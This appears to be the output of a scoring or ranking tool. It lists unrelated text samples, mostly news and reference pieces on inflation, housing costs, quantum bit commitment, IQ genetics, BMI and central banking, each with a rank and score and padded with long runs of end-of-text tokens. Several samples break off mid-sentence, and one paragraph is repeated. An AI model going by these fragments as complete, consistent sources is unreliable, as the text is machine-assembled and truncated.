programs.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 5; Score = 4685824.0 +<|begin_of_text|>Cryptography’s most familiar application is perhaps the sending of coded messages: Alice wants to communicate some information to her distant confidante Bob. She worries that her message might be intercepted by an eavesdropper, so she encrypts it in a way that only Bob can decipher. But there exists a whole range of complementary cryptographic tasks—such as online auctions and secure voting—in which Alice and Bob want to guard against attacks not from eavesdroppers but from each other. + +To develop algorithms to perform those other tasks, cryptographers use a building block called bit commitment: Alice chooses a bit (a 1 or 0) to be revealed later; Bob wants to ensure that Alice can’t change her mind in the meantime, while Alice wants to ensure that Bob has no way to learn which bit she chose until the appointed time. + +Although quantum theory is the basis for perfectly secure encryption, it offers no path to secure bit commitment. But a different law of physics, the impossibility of faster-than-light signaling, has now come to the rescue, and Anthony Martin, Hugo Zbinden, and their colleagues at the University of Geneva have implemented a protocol for achieving bit commitment for a full 24 hours. + +For the protocol to work, Alice and Bob work with trusted partners Amy and Brian, respectively. Bob and Brian take turns exchanging data with Alice and Amy, in such a way that each exchange falls outside the forward light cone of the previous one. Each of Alice’s and Amy’s answers depends on both the data they receive from Bob or Brian and on information Alice and Amy agree on in advance, including the bit they want to commit. For Alice to cheat and change the bit at any time in the middle of the protocol, she’d need to know what happened in Amy’s most recent exchange with Brian; relativity prevents her from having that information. + +In their 24-hour implementation, Martin and colleagues repeated the exchanges for 5 billion rounds, one every 17 µs, with a total of 162 GB of data. According to two theory papers from the past year, the probability that the protocol is vulnerable to cheating is less than one in a billion. (E. Verbanis et al., Phys. Rev. Lett. 117, 140506, 2016.)<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 6; Score = 4587520.0 +<|begin_of_text|>LONDON (Reuters) - British inflation rose in April for the first time in 10 months, but as the increase was partly due to a late Easter holiday, which pushed up transport costs, it was unlikely to alter interest rate expectations. + +A woman pays a market trader for goods in Soho's Berwick Street Market in central London May 17, 2011. REUTERS/Paul Hackett + +Official data also showed that growth in house prices eased in March, potentially tempering concerns about a bubble brewing in the property market although some more up-to-date surveys have shown prices picking up again. + +The consumer price index rose more than expected to an annual rate of 1.8 percent in April, from 1.6 percent in March, which had been its lowest level in more than four years, the Office for National Statistics ONS said. + +It was the first rise in the CPI since June 2013 and above a Reuters poll forecast for inflation of 1.7 percent in April. + +Sterling hit a 16-month high against the euro and rose against the dollar before giving up much of its gains as market expectations that the Bank of England will raise interest rates in about a year’s time remained largely intact. + +The opposition Labour party jumped on Tuesday’s figures, saying they showed the government’s complacency about the “cost of living” crisis facing many Britons as wage growth has lagged inflation. + +Economists however saw little change in price pressures. + +“Easter effects aside, the latest release provides little evidence of significant or broad-based price pressures,” said Victoria Clarke, an economist with bank Investec. + +Factory gate inflation in April was weaker than economists’ predictions. + +Higher airfares linked to Easter and other transport costs helped push up consumer prices, the ONS said. Easter fell in April this year but in late March last year. + +Offsetting those rises, food price growth was the lowest in eight years as a mild spring kept vegetable prices down. + +Core CPI, which excludes food costs and other items but does include transport costs, rose 2.0 percent, its strongest rate since September last year. + +House prices - which are an increasing source of concern for the Bank of England - were up 8.0 percent on the year in March, slowing from a 9.2 percent rise in February, the ONS also said. + +Prices in London, however, were up 17 percent on the year, although that was less than a 17.8 percent increase in February, the biggest increase since 200 +================================================================================ +Rank = 7; Score = 4456448.0 +<|begin_of_text|>Intelligence, cognitive ability or cognitive performance is usually measured by a battery of tests that aim to quantify skills such as memory and analytical ability. There is loads of variation between people in how they perform on such tests, and these differences can be due to genetic and environment factors, and their interplay. + +In research published in the Proceedings of the National Academy of Science (PNAS) today, we show three genetic variants in humans that can account for a couple of IQ points – but before you get excited, these are only three variants out of likely thousands. + +The genetics of cognitive performance + +While a measure of “intelligence” can be controversial, cognitive performance scores are widely used because of their predictive ability. Educational attainment, income, job performance and health are all correlated with cognitive performance. + +By comparing the cognitive performance between family members, including comparisons between identical and non-identical twins, scientists are able to quantify the contribution of genetic and environmental causes of individual differences. + +Decades of research have shown that genetic factors account for about half of the causes of individual difference in cognitive performance, and recent studies using unrelated people have confirmed that a substantial proportion of individual difference is due to genetic factors. + +So, we know now that cognitive performance is heritable, but where are the genes? Despite considerable attempts to find genes for cognitive performance, no specific genes had been found and replicated. + +One reason for this puzzle is that there are a lot of genes involved – thousands, even – and their individual gene effect sizes are tiny. Past studies couldn’t find them because sample sizes were not large enough to detect genes with statistical significance. + +So how did we overcome this problem? + +Last year, a huge international collaborative study of more than 126,000 people correlated millions of genetic variants with educational attainment and discovered three genetic variants associated with it. + +Education attainment is correlated with cognitive performance, so given these two observations, we tested the genetic variants for education attainment with their associations with cognitive performance, which we report in PNAS today. + +We tested 69 genetic variants from the educational attainment study (of almost 107,000 people) in independent samples of 24,000 people who had a cognitive performance score. This two-stage strategy is called a “proxy-phenotype method” since educational attainment is a proxy phenotype (an observable characteristic or trait) for cognitive performance. + +The essence of this design was to piggy-back on a much larger study from a correlated trait (educational attainment) to pre-select a small number of genetic variants. These were then tested for association with cognitive performance – +================================================================================ +Rank = 8; Score = 4390912.0 +<|begin_of_text|>When the Treasury tried to work out the impact of a Leave vote in its much-panned report ahead of the referendum, it notoriously forecast a recession that simply didn't happen. + +It got it horrendously, embarrassingly wrong: in fact the economy has grown even faster after the vote, as consumers kept on spending. + +But there were two forecasts they got right. + +First, they said that the pound would fall sharply, by around 12-15%. + +Second, that this would push up inflation - the annual rate at which prices across the economy are changing - by 2.3%-2.7% more than if the UK had voted to stay. + +The pound did indeed depreciate considerably after the Leave vote - in fact, based on the latest figures, it is 13% weaker than before the vote (against a basket of currencies). + +And now the Office for National Statistics has reported that inflation - as measured by the consumer price index - has risen to 2.3%. + +:: Household squeeze as inflation reaches three-and-a-half year high + +This is the highest rate of change since late 2013, and is also the first time the measure has been above the Bank of England's target in that period. + +There is little doubt that this was caused primarily by the fall in the pound (which in turn was caused by the referendum vote - indeed, it plummeted on referendum night itself). + +Because the UK relies so heavily on imported goods (we have a trade deficit, remember?) it is particularly sensitive to changes in the currency. + +When the pound rises, prices fall; and when the pound falls, prices rise. + +That's what happened in 2008 when the pound fell amid the financial crisis; that ultimately pushed up inflation to around 5%. It's what's happening now. + +Indeed, a glance at the costs manufacturers are paying for imported materials underlines that story. + +In the three years up until June 2016, those prices were falling on a year-on-year basis. + +They suddenly started to rise following the referendum. + +Over the past three months the annual rate hit 18.8% - the highest level since 2008. + +That would imply inflation has even further to rise. + +Indeed, as we reported a couple of weeks ago, timely measures of prices (collected from the internet) suggest prices might already be rising by more than 3%. + +Now, on the one hand, inflation at or around target is no cause for panic. Indeed, a little bit of inflation is actually quite a good thing. + +But the concern +================================================================================ +Rank = 9; Score = 4390912.0 +<|begin_of_text|>Introduction A carbon footprint is the measure of the amount of greenhouse gases (Carbon footprint), measured in units of carbon dioxide, produced by human activities. A carbon footprint can be measured for an individual or an organization, and is typically given in tons of CO 2 -equivalent (CO 2 -eq) per year. For example, the average North American generates about 20 tons of CO 2 -eq each year. The global average carbon footprint is about 4 tons of CO 2 -eq per year (Figure 1). + +Introduction A carbon footprint is the measure of the amount of greenhouse gases (Carbon footprint), measured in units of carbon dioxide, produced by human activities. A carbon footprint can be measured for an individual or an organization, and is typically given in tons of CO 2 -equivalent (CO 2 -eq) per year. For example, the average North American generates about 20 tons of CO 2 -eq each year. The global average carbon footprint is about 4 tons of CO 2 -eq per year (Figure 1). + +Figure 1. National carbon dioxide (CO2) emissions per capita. (2005). (Source: UNEP/GRID-Arendal Maps and Graphics Library) + +An individual’s or organization’s carbon footprint can be broken down into the primary and secondary footprints. The primary footprint is the sum of direct emissions of greenhouse gases from the burning of fossil fuels for energy consumption and transportation. More fuel-efficient cars have a smaller primary footprint, as do energy-efficient light bulbs in your home or office. Worldwide, 82% of anthropogenic greenhouse gas emissions are in the form of CO 2 from fossil fuel combustion (Figure 2). + +The secondary footprint is the sum of indirect emissions of greenhouse gases during the lifecycle of products used by an individual or organization. For example, the greenhouse gases emitted during the production of plastic for water bottles, as well as the energy used to transport the water, contributes to the secondary carbon footprint. Products with more packaging will generally have a larger secondary footprint than products with a minimal amount of packaging. + +Greenhouse gases and the greenhouse effect + +Figure 2. Anthropogenic greenhouse gas emissions. (Source: Energy Information Administration) + +Although carbon footprints are reported in annual tons of CO 2 emissions, they actually are a measure of total greenhouse gas emissions. A greenhouse gas is any gas that traps heat in the atmosphere through the greenhouse effect. Because of the presence of greenhouse gases in our atmosphere the average temperature of the Earth +================================================================================ +Rank = 10; Score = 4145152.0 +<|begin_of_text|>EDMONTON –The University of Alberta’s Board of Governors approved a tuition increase for both domestic and international students. + +In U of A President Indira Samarasekera’s blog, she explained tuition fees for domestic undergraduate and graduate students will increase by one per cent. + +“The Board passed a motion to increase general tuition for domestic undergraduate and graduate students by one per cent (CPI), the maximum allowable increase as set by government,” she explained in a blog post dated Dec. 13. + +Samarasekera also explained that after “considerable debate” the board also approved a five per cent overall increase to undergraduate international tuition and fees. + +“This increase includes the one per cent increase for CPI. The additional four per cent increase will be used to fund programming and services for international students as well to address other inflationary pressures faced by the university,” she said in the blog. + +Tuition for graduate international students will increase by one per cent. + +“As you know, the Provost’s Office is in the process of reviewing graduate student experience, enrolment, and funding, a review which includes, of course, the experience and support we provide international graduate students. Once the full review is complete, we will determine at that point whether we will bring forward proposals changing domestic and international graduate tuition and support.” + +The Provost’s Office also launched an online feedback form to get input from faculty, staff and students. + +All increases and fees will be effective as of Sept. 1, 2014 for all students. + +Samarasekera also said Acting Provost Martin Ferguson-Pell and the senior team decided to partially restore funding for graduate assistantships in the Science and Arts faculties. The funding was reduced in the 2013-2014 budget, however, provincial reinvestment of $14.4 million in the university’s operating grant meant the institution could allocate $2.4 million in the 2014-2015 budget to graduate assistantships. + +Samarasekera also commented on the recent provincial cabinet shuffle, which saw Dave Hancock replace Thomas Lukaszuk as deputy premier and minister of advanced education. + +WATCH: Premier Redford shuffles her cabinet + +Hancock is the fourth minister to take the advanced education portfolio since Premier Alison Redford was elected. + +“I look forward to meeting with the new Deputy Premier once he is sworn into office and discussing with him his vision and plans for Alberta’s post-secondary sector,” wrote Samarasekera. + +“He was our minister when I first came to the U of A. Spring 2005 marked the +================================================================================ +Rank = 11; Score = 4046848.0 +<|begin_of_text|>Inflation accounting comprises a range of accounting models designed to correct problems arising from historical cost accounting in the presence of high inflation and hyperinflation.[1] [2] For example, in countries experiencing hyperinflation the International Accounting Standards Board requires corporations to implement financial capital maintenance in units of constant purchasing power in terms of the monthly published Consumer Price Index. This does not result in capital maintenance in units of constant purchasing power since that can only be achieved in terms of a daily index. + +Historical cost basis in financial statements [ edit ] + +Fair value accounting (also called replacement cost accounting or current cost accounting) was widely used in the 19th and early 20th centuries, but historical cost accounting became more widespread after values overstated during the 1920s were reversed during the Great Depression of the 1930s. Most principles of historical cost accounting were developed after the Wall Street Crash of 1929, including the presumption of a stable currency.[3] + +Measuring unit principle [ edit ] + +Under a historical cost-based system of accounting, inflation leads to two basic problems. First, many of the historical numbers appearing on financial statements are not economically relevant because prices have changed since they were incurred. Second, since the numbers on financial statements represent dollars expended at different points of time and, in turn, embody different amounts of purchasing power, they are simply not additive. Hence, adding cash of $10,000 held on December 31, 2002, with $10,000 representing the cost of land acquired in 1955 (when the price level was significantly lower) is a dubious operation because of the significantly different amount of purchasing power represented by the two numbers.[4] + +By adding dollar amounts that represent different amounts of purchasing power, the resulting sum is misleading, as one would be adding 10,000 dollars to 10,000 Euros to get a total of 20,000. Likewise subtracting dollar amounts that represent different amounts of purchasing power may result in an apparent capital gain which is actually a capital loss. If a building purchased in 1970 for $20,000 is sold in 2006 for $200,000 when its replacement cost is $300,000, the apparent gain of $180,000 is illusory. + +Misleading reporting under historical cost accounting [ edit ] + +"In most countries, primary financial statements are prepared on the historical cost basis of accounting without regard either to changes in the general level of prices or to increases in specific prices of assets held, except to the extent that property, plant +================================================================================ +Rank = 12; Score = 3735552.0 +<|begin_of_text|>Experts have roundly criticized BC Premier Christy Clark’s recent home ownership grant policy. A key part of the negative reaction has been based on fears that interest free grants will increase housing prices and drive a further wedge between incomes and housing costs, a divide already plaguing the Vancouver and lower mainland markets. + +These worries about the divide between housing prices and incomes are well founded. + +Trends in residential property prices and housing affordability between 2005 and 2016 paint a grim picture in both Vancouver and the city of Toronto. This article looks at those trends, analyzing the mortgage cost of homes in these two cities and in comparison to Canada more broadly. + +More specifically, it looks at the number of weeks of labour time it would take workers making the average weekly wage to make a mortgage purchase in each city. The data are startling. + +Methodology: + +The nominal dollar cost of a house or a condo today is much higher than it was 10 or 20 years ago. Indeed, it is even higher than what it was just a couple of years ago. There exists a number of indices that look at the price of housing by deflating the nominal dollar price of a house by the consumer price index (CPI) to get an idea of how fast housing prices are rising relative to the general rise in prices of consumer goods. + +This article does something different. It calculates how many weeks of labour time, paid at average provincial weekly rates, it takes to purchase an average residential property. In order to do so, it makes some key assumptions. + +The calculations in this article concern changes in the mortgage costs of residential property purchases. Here, I assume that the entire price of the properties (inclusive of mortgage fees and financing costs) were paid through a mortgage financed with 5-year mortgage loans amortized over 15 years. In other words, it assumes no initial down payment. By looking at the weeks of labour time, the analysis assumes that all of a person’s income is going towards financing their mortgage. Of course, we know people have many other fixed costs and financial responsibilities. But this measure gives us an informative picture of the glaring gap between incomes and housing prices. + +Of course, since we don’t know what interest rates and wage rates will be after 2016, the numbers for the years after 2011 are estimates based on an extrapolation of recent data for these two variables. The calculation also assume, after 2011, a return towards trend values in the case of interest rates). Finally, the data is based on yearly averages. So +================================================================================ +Rank = 13; Score = 3620864.0 +<|begin_of_text|>This article is about the medical term. For the stock market term, see overweight (stock market) + +Overweight The overweight range according to the body mass index (BMI) is the area on the chart where BMI > 25 Specialty Endocrinology + +Being overweight or fat is having more body fat than is optimally healthy. Being overweight is especially common where food supplies are plentiful and lifestyles are sedentary. + +As of 2003, excess weight reached epidemic proportions globally, with more than 1 billion adults being either overweight or obese.[1] In 2013 this increased to more than 2 billion.[2] Increases have been observed across all age groups. + +A healthy body requires a minimum amount of fat for proper functioning of the hormonal, reproductive, and immune systems, as thermal insulation, as shock absorption for sensitive areas, and as energy for future use. But the accumulation of too much storage fat can impair movement, flexibility, and alter the appearance of the body. + +Classification + +The degree to which a person is overweight is generally described by the body mass index (BMI). Overweight is defined as a BMI of 25 or more, thus it includes pre-obesity defined as a BMI between 25 and 30 and obesity as defined by a BMI of 30 or more.[3][4] Pre-obese and overweight however are often used interchangeably, thus giving overweight a common definition of a BMI of between 25–30. There are, however, several other common ways to measure the amount of adiposity or fat present in an individual's body. + +Body mass index + +The body mass index (BMI) is a measure of a person's weight taking into account their height. It is given by the following formula: BMI equals a person's weight (mass) in kilograms divided by the square of the person's height in metres. The units therefore are kg/m2 but BMI measures are typically used and written without units. + +BMI provides a significantly more accurate representation of body fat content than simply measuring a person's weight. It is only moderately correlated with both body fat percentage and body fat mass (R2 of 0.68).[5] It does not take into account certain factors such as pregnancy or bodybuilding; however, the BMI is an accurate reflection of fat percentage in the majority of the adult population. + +The body volume index (BVI) was devised in 2000 as a computer, rather than manual, measurement of the human body for obesity and an alternative to the BMI + +BVI uses 3D software +================================================================================ +Rank = 14; Score = 3358720.0 +<|begin_of_text|>A teen invites “Destiny” to the prom using the face of a cliff in Black Cliffs east of Boise. (Patrick Orr/Ada County Sheriff’s Office via AP) + +Jay L Zagorsky is an economist at Ohio State University. + +Prom season is now upon us, the key social event of most people’s high school experience. My youngest child is preparing to attend her first senior prom and a steady supply of fancy dresses has begun to appear in our house. As my credit card bills climbed ever higher, I began to wonder, how has the price of the prom changed over time? + +For teenagers scraping together money from minimum-wage jobs and informal work like babysitting and snow shoveling, the question has immediate relevance because the price determines if they can afford to go. For parents of teens, the question is relevant because the prom is another expensive bill competing with lots of other financial priorities. + +Even for people not directly connected to the high school experience, the price of the prom is important. The U.S. is a melting pot of different cultures, religions and ethnic groups. Tying these disparate groups together is a variety of common shared experiences, such as celebrating the 4th of July, eating turkey at Thanksgiving and, for teens, experiencing the prom. + +When the prom’s price goes down, more teens can afford to go, and it becomes a more inclusive shared experience. When the price rises, however, the prom becomes a more exclusive social event attended mostly by those with wealthier parents, resulting in fewer common shared experiences. + +Cereal and donuts + +It is possible to get a sense of the changing price of going to the prom using government data. The Bureau of Labor Statistics provides detailed monthly information on the trend in prices over time for a vast number of items purchased by the typical family. + +The government does not care, directly, about the price of the prom – unfortunately it has yet to craft a “prom index.” However, using a subset of the inflation data we can see that proms are actually getting relatively cheaper over time. + +The typical 17-year-old going to the prom this year was born in 1998. Since then, the Consumer Price Index, or CPI, has increased 45 percent. That means the average item a family bought for $1 in 1998 now costs $1.45. Each month the CPI releases hundreds of detailed price indexes so that anyone can see, for example, if the price of breakfast cereal is rising faster than, say, donuts over time. + +The Prom Price Index +================================================================================ +Rank = 15; Score = 3293184.0 +<|begin_of_text|>The bad news in today's PPI inflation report: pork prices surged yet again, rising 6.8% on the month, and up 24% from a year ago, while beef/veal costs rose by 2.1% on the month to a record indexed 251.8% (we dread to wade through the BLS "hedonic-adjustment" calculation for that particular food product) and are now up a sticky 27.4% from a year ago, which is just shy of the recent record Y/Y jump of 28.6% posted in August. So for all those who still see no inflation, could you please share you Delmonico's expense account with the rest of us? + +The good news: for the first time in years, booze prices declined from a year ago. So, with compliments of the hoapy president: don't be moapy and start drinking cheap booze, preferably early and often, as you try to remember - in an alcoholic daze - what beef tastes like.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 16; Score = 3162112.0 +<|begin_of_text|>A heat map of Boston apartments by price per bedroom with MBTA route overlay. + +A new tool developed by Jeff Kaufman, a 27-year-old programmer at Google in Cambridge, allows apartment renters to visualize where Boston’s most and least expensive apartments are. Kaufman's heat map displays the cost per bedroom relative to each Boston neighborhood. + +The map indicates the most expensive apartments in Boston tend to hover between Back Bay and Downtown Boston and on into the Seaport District. The region’s least expensive apartments are found near Mattapan, Dorchester and Revere. + +Areas of Cambridge along the Red Line also display expensive apartment listings, where the booming tech economy is squeezing commercial rents for startups. + +Kaufman's first iteration of the heat map originated in 2011 when he was looking for a place to live. + +"I was looking for an apartment and didn't have a good sense of how expensive different parts of the city were," Kaufman says. "I wanted to have a map that gave you a rough idea of the city and how expensive they were." + +Reddit user “yiseowl” helped explain the heat map by overlaying the MBTA train map over Kaufman’s. The juxtaposition shows some correlation between rent and MBTA accessibility. + +According to Kaufman’s data, which he took from apartment rental search engine Padmapper, the average cost per bedroom in 2013 is $1,314. In 2011, the average cost per bedroom was $1,141. + +This is a much greater increase than inflation. The [Consumer Price Index] in June 2011 was 225.922 while the December 2012 one was 229.594, so you would expect $767/room then to turn into $780/room now instead of the $895 we actually see. + +Curbed Boston also published a real-estate map in December of the 15 most expensive home sales of 2012.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 17; Score = 3047424.0 +<|begin_of_text|>A deflationary Bacon Cheeseburger Index combined with optimistic Google searches for timeshares reflect a U.S. economy in flux — and, likely, a Federal Reserve in flux. + +These readings, plus snapshots of car buying, gun ownership, food-stamp demand and more, make up the “Off the Grid Indicators” report that creator Nicholas Colas, chief market strategist at the New York–based global brokerage Convergex, argues pushes economic sleuthing beyond the obvious payrolls report or consumer price index. + +Read: U.S. adds 215,000 new jobs in March as more workers enter labor force + +Government data often strip out volatile food prices, but market strategist Nicholas Colas and company say doing so miscalculates inflation expectations among shoppers. + +Highlights from the current edition of the now five-year-old quarterly report, especially when combined with traditional government- and industry-issued data and anecdotes, indicate the Fed can be slow with raising interest rates, Colas said. The Fed’s next two meetings come later this month and then in June. + +Read: Fed will likely hike rates in June in wake of jobs report, economists say + +Convergex even trademarked its “Bacon Cheeseburger Index,” an evenly split minibasket of the popular beef-bacon-and-cheese combo that can serve as a relatable inflation gauge. Government data often strip out volatile food prices, but Colas and company say doing so miscalculates inflation expectations among food-conscious shoppers. + +As of the first quarter, thanks to price declines in all three of these cholesterol commodities, a bacon cheeseburger now costs 5.1% less than a year ago, the Convergex report shows. + +A look back at the Bacon Cheeseburger Index to 1990 finds that it is actually a decent indicator of deflation risk. Prior periods when the BCI turned resoundingly negative (3% or more) since 1990 include: 2009 (financial crisis); 1998 (emerging market and Long Term Capital collapse), and 1992 (the lead up to the Iraq invasion). In each case, the Fed was cutting interest rates, not raising them. + +“So should the Fed actually use the Bacon Cheeseburger Index? Of course not. But does it help explain in one compact, if anecdotal, form why the Federal Reserve is happy to hold off on rate increases? I think it does,” said Colas. + +Here are some of the report’s other findings: + +• Since Google GOOGL, +0 +================================================================================ +Rank = 18; Score = 2768896.0 +<|begin_of_text|>During the Reserve Bank of India’s (RBI) press conference last week, one exchange stood out. Asked about a meeting scheduled by the finance ministry in New Delhi to discuss the RBI’s policy, the governor of India’s central bank, Urjit Patel, replied: “The meeting did not take place. All the MPC members declined the request of the finance ministry for that meeting." + +The MPC is the Monetary Policy Committee, a six-member council that sets India’s benchmark interest rates. It’s a new institution, less than a year old; Patel’s predecessor, Raghuram Rajan, had full authority to set interest rates himself. But it seems India’s government is not as comfortable as many had hoped with this new arrangement—summoning the MPC members to the finance ministry before they decided rates was widely seen as an attempt to 